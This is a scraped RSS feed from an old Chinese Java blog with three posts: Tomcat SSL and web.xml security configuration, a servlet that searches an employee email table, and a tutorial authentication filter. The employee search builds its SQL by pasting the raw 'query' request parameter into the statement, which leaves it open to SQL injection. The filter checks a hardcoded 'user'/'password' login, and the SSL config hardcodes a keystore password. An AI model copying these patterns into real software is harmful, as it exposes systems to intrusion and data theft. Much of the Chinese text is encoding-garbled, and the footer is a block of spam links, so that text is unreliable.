配置ssl in tomcathttp://www.tkk7.com/lmsun/archive/2005/11/02/17820.htmlmy javamy javaWed, 02 Nov 2005 07:21:00 GMThttp://www.tkk7.com/lmsun/archive/2005/11/02/17820.htmlhttp://www.tkk7.com/lmsun/comments/17820.htmlhttp://www.tkk7.com/lmsun/archive/2005/11/02/17820.html#Feedback0http://www.tkk7.com/lmsun/comments/commentRss/17820.htmlhttp://www.tkk7.com/lmsun/services/trackbacks/17820.html
keytool -genkey -alias tomcat -keyalg RSA

~省证书文g名ؓQ?keystore

2、修Ҏ件server.xml
  <Connector port="8443"
               maxThreads="150" minSpareThreads="25" maxSpareThreads="75"
               enableLookups="false" disableUploadTimeout="true"
               acceptCount="100" debug="0" scheme="https" secure="true"
               clientAuth="false"
      keystoreFile="C:\keystore\.keystore"
      keystorePass="netscape"
      sslProtocol="TLS" />

3、web.xml
<security-constraint>
    <web-resource-collection>
      <web-resource-name>Purchase</web-resource-name>
      <url-pattern>/ssl/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>registered-user</role-name>
    </auth-constraint>
    <user-data-constraint>
      <transport-guarantee>CONFIDENTIAL</transport-guarantee>
    </user-data-constraint>
  </security-constraint>
 
  <!-- Only users in the administrator role can access
       the delete-account.jsp page within the admin
       directory. -->
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Account Deletion</web-resource-name>
      <url-pattern>/admin/delete-account.jsp</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>administrator</role-name>
    </auth-constraint>
  </security-constraint>
 
  <!-- Tell the server to use form-based authentication. -->
  <login-config>
    <auth-method>FORM</auth-method>
    <form-login-config>
      <form-login-page>/admin/login.jsp</form-login-page>
      <form-error-page>/admin/login-error.jsp</form-error-page>
    </form-login-config>
  </login-config>
   
 
4、重启tomcat




my java 2005-11-02 15:21 发表评论
]]>
ListEmpActionhttp://www.tkk7.com/lmsun/archive/2005/09/27/14187.htmlmy javamy javaTue, 27 Sep 2005 05:21:00 GMThttp://www.tkk7.com/lmsun/archive/2005/09/27/14187.htmlhttp://www.tkk7.com/lmsun/comments/14187.htmlhttp://www.tkk7.com/lmsun/archive/2005/09/27/14187.html#Feedback0http://www.tkk7.com/lmsun/comments/commentRss/14187.htmlhttp://www.tkk7.com/lmsun/services/trackbacks/14187.html/*
 * Created on 2005-9-27
 *
 * TODO To change the template for this generated file go to
 * Window - Preferences - Java - Code Style - Code Templates
 */
package fibernews.action;
import javax.servlet.http.*;

import java.sql.*;
import java.util.*;
import fibernews.framework.db.*;
import fibernews.beans.Employee;
import fibernews.util.function.HandleString;
import fibernews.framework.logging.Logger;

/**
 * @author Administrator
 *
 * TODO To change the template for this generated type comment go to
 * Window - Preferences - Java - Code Style - Code Templates
 */
public class ListEmpAction extends Action {

 List list ;
 public String process(HttpServletRequest request, HttpServletResponse response) {
     Connection conn=DBHelper.getConnection();
 Statement st=null;
     PreparedStatement pst=null;
     ResultSet rs=null ;
        String  query=HandleString.toChinese(request.getParameter("query"));
        if ((query==null)||query.trim().equals("")) query="lmsun";
  try{
 
      String sql="select * from employee_email where name like '%"+query+"%' or email like '%"+query+"%'" ;
      //st=conn.createStatement();
  pst=conn.prepareStatement(sql);
  rs=pst.executeQuery();
  list=new ArrayList();
  Employee emp;
  while (rs.next()){
   emp=new Employee();
   emp.setId(rs.getString("id"));
   emp.setEmployee_bh(rs.getString("employee_bh"));
   emp.setName(rs.getString("name"));
   emp.setEmail(rs.getString("email"));
   emp.setDepartment1(rs.getString("department1"));
   emp.setDepartment2(rs.getString("department2"));
   emp.setDepartment3(rs.getString("department3"));
   list.add(emp);
  }

  
  }
  
   catch (Exception e) {
         System.out.println("Error Connecting to catalog DB: " + e.toString());
       }
   finally {
    DBHelper.close(rs,pst,conn);
   }
   request.setAttribute("empList",list);
   return "/intra/query/emailbook.jsp";
  
 }
   public static void main(String[] args)
   {
     ListEmpAction empaction = new ListEmpAction();
     System.out.print("End"); 
   }
  
}



my java 2005-09-27 13:21 发表评论
]]>
AuthenticationFilterqo?/title><link>http://www.tkk7.com/lmsun/archive/2005/09/12/12764.html</link><dc:creator>my java</dc:creator><author>my java</author><pubDate>Mon, 12 Sep 2005 08:27:00 GMT</pubDate><guid>http://www.tkk7.com/lmsun/archive/2005/09/12/12764.html</guid><wfw:comment>http://www.tkk7.com/lmsun/comments/12764.html</wfw:comment><comments>http://www.tkk7.com/lmsun/archive/2005/09/12/12764.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.tkk7.com/lmsun/comments/commentRss/12764.html</wfw:commentRss><trackback:ping>http://www.tkk7.com/lmsun/services/trackbacks/12764.html</trackback:ping><description><![CDATA[<STRONG>重定向请?<BR><BR></STRONG>  下面我们来构造一个AuthenticationFilterqo器,它的功能是截获对Controller Servlet的请求,然后验证用户的n份。按照前面介l的步骤用向导创滤器Ӟ向导提供了定义初始化参数、过滤器的URL和Servlet映射{参数。如果不讄q类参数Q缺省情况下向导用过滤器本n的名U创Z个URL映射Q我们将在下面用~辑web.xml文g的方式定义映,因此现在先认可缺省倹{注意,如果你想在链中用一个以上的qo器,那就必须手工~辑web.xml?<BR><BR>  在向g点击“完成”按钮后QWSAD立即构造出qo器的骨架代码。对于本例来_接下来我们唯一的Q务就是将代码插入doFilter()ҎQ如Listing 1所C?<BR><BR><CCID_NOBR> <TABLE cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=540 align=center borderColorLight=black border=1> <TBODY> <TR> <TD class=code bgColor=#e6e6e6><PRE><CCID_CODE>// Listing 1: AuthenticationFilter.java public void doFilter( ServletRequest req, ServletResponse resp, FilterChain chain) throws ServletException, IOException { String nextPage; RequestDispatcher rd = null; //查用户名U和密码 if (req.getParameter("userid") != null) { if (!((req.getParameter("password").equals("password")) && (req.getParameter("userid").equals("user")))) { ArrayList actionreport = newArrayList(); actionreport.add("dp|。。?); (((HttpServletRequest) req).getSession()).setAttribute( "actionreport", actionreport); nextPage = "failure.jsp"; System.out.println("获得了来自过滤器的应{?); // 请求直接传递给下一个页面(而不是Controller ServletQ? rd = req.getRequestDispatcher(nextPage); rd.forward(req, resp); } else { req.setAttribute("login", "loginsuccess"); // 请求传递给Controller Servlet chain.doFilter(req, resp); System.out.println("获得了来自过滤器的应{?); } } else { rd = req.getRequestDispatcher("Welcome.jsp"); rd.forward(req, resp); } }</CCID_CODE></PRE></TD></TR></TBODY></TABLE></CCID_NOBR><BR><BR>  从上面的代码可以看出Q在qo器中验证用户w䆾的方式仍和^常的一栗在此过E中Qؓ了获得session对象Q我们把ServletRequest定型QcastQ成了HttpServletRequest。如果用h能通过w䆾验证Q我们不再把h传递给Controller ServletQ而是通过RequestDispatcher把请求传递给报告面Qfailure.jspQ?<BR><BR>  如果用户通过了n份验证,则我们调用chain.doFilter()Q允许应{进入Controller——这是因用chain.doFilter()ӞN面已l没有其他过滤器Q所以控制将以POST方式转入作ؓController的ServletQ实际上Qchain.doFilter()调用Controller.doPost()Ҏ?<BR><BR>  发送请求给Controller之前Q我们可以根据用戯得的w䆾证书来设|请求的属性,q些信息帮助Controller及其辅助cd理请求。作Z个例子,我们讄了请求的login属性,然后在Controller中检查该属性,Controller把应{返回给success.jspQ如Listing 2所C)?<BR><BR><CCID_NOBR> <TABLE cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=540 align=center borderColorLight=black border=1> <TBODY> <TR> <TD class=code bgColor=#e6e6e6><PRE><CCID_CODE>// Listing 2: controller.java protected final void doPost( HttpServletRequest request, HttpServletResponse response) { // begining codes //--用户已通过w䆾验证 if (((String) request.getAttribute("login")).equals ("login success")) { ArrayList actionreport = new ArrayList(); actionreport.add("Correct Password"); session.setAttribute("actionreport", actionreport); nextPage = "success.jsp"; } if (dispatch) { RequestDispatcher rd = getServletContext().getRequestDispatcher(nextPage); rd.forward(request, response); } else { session.invalidate(); } // ending codes }</PRE></TD></TR></TBODY></TABLE><img src ="http://www.tkk7.com/lmsun/aggbug/12764.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.tkk7.com/lmsun/" target="_blank">my java</a> 2005-09-12 16:27 <a href="http://www.tkk7.com/lmsun/archive/2005/09/12/12764.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss> <footer> <div class="friendship-link"> <p>лǵվܻԴȤ</p> <a href="http://www.tkk7.com/" title="亚洲av成人片在线观看">亚洲av成人片在线观看</a> <div class="friend-links"> </div> </div> </footer> վ֩ģ壺 <a href="http://haiwaizhuyun.com" target="_blank"></a>| <a href="http://6006284.com" target="_blank">޹ŮƷþþ</a>| <a href="http://xx2e.com" target="_blank">պƵ߾ƷƵѹۿ </a>| <a href="http://junfurui.com" target="_blank">²߾ƷƵѹۿ</a>| <a href="http://zjszbwzl.com" target="_blank">þþþ޾ƷС˵</a>| <a href="http://by23336.com" target="_blank">99þֻƷ</a>| <a href="http://wusongtv.com" target="_blank">ƷؼһëƬѹۿ</a>| <a href="http://jiuse54.com" target="_blank">޹Ʒþ66</a>| <a href="http://anyliz.com" target="_blank">ҹ߹ۿ</a>| <a href="http://26cgw.com" target="_blank">a߹ۿƵ</a>| <a href="http://xww678.com" target="_blank">޷</a>| <a href="http://aijiu868.com" target="_blank">ŷղþ99</a>| <a href="http://vvv75.com" target="_blank">18ڵվ</a>| <a href="http://vc77777.com" target="_blank">պһƵ</a>| <a href="http://biarn.com" target="_blank">޾ƷŮƵ</a>| <a href="http://1777000.com" target="_blank">޾Ʒ˾߹ۿ</a>| <a href="http://nnlxl.com" target="_blank">һëƬ</a>| <a href="http://haidiaori.com" target="_blank">ëƬ100ѹۿ</a>| <a href="http://jiujiujingpin.com" target="_blank">avһ</a>| <a href="http://taoh2517.com" target="_blank">պһҳƷ</a>| <a href="http://gzweida88.com" target="_blank">ҹƵ</a>| <a href="http://twtairun.com" target="_blank">ƷAVƬ߹ۿ</a>| <a href="http://wwwzs88.com" target="_blank">AVƷһ</a>| <a href="http://wyj4.com" target="_blank">91޾Ʒһۺϲ</a>| <a href="http://sdsupuchem.com" target="_blank">һ </a>| <a href="http://sewuji.com" target="_blank">ëƬa߹ۿ67194</a>| <a href="http://508009.com" target="_blank">߳׽ˮAƬ </a>| <a href="http://popodino.com" target="_blank">̼aƬվ</a>| <a href="http://jogador1.com" target="_blank">˳Ƶ߹ۿ</a>| <a href="http://zzhdrsqwx.com" target="_blank">Ƶ</a>| <a href="http://wwwjjz.com" target="_blank">AV뾫Ʒ鶹</a>| <a href="http://gzqhit.com" target="_blank">ҹ޸˾</a>| <a href="http://bobostrong31.com" target="_blank">Ƭ߹ۿѴȫ</a>| <a href="http://wanguoshan.com" target="_blank">һƵ߹ۿwww </a>| <a href="http://8hnbuk14.com" target="_blank">ͽxx</a>| <a href="http://3fsf.com" target="_blank">޾ƷƷ벻</a>| <a href="http://3589006.com" target="_blank">Ƭ91Ʒѹۿͬ</a>| <a href="http://0888qb.com" target="_blank">߹ۿ</a>| <a href="http://mlhcd.com" target="_blank">þһҰ</a>| <a href="http://www77714.com" target="_blank">һƵ</a>| <a href="http://4388x4.com" target="_blank">պɫպƵվ</a>| <script> (function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); </script> </body>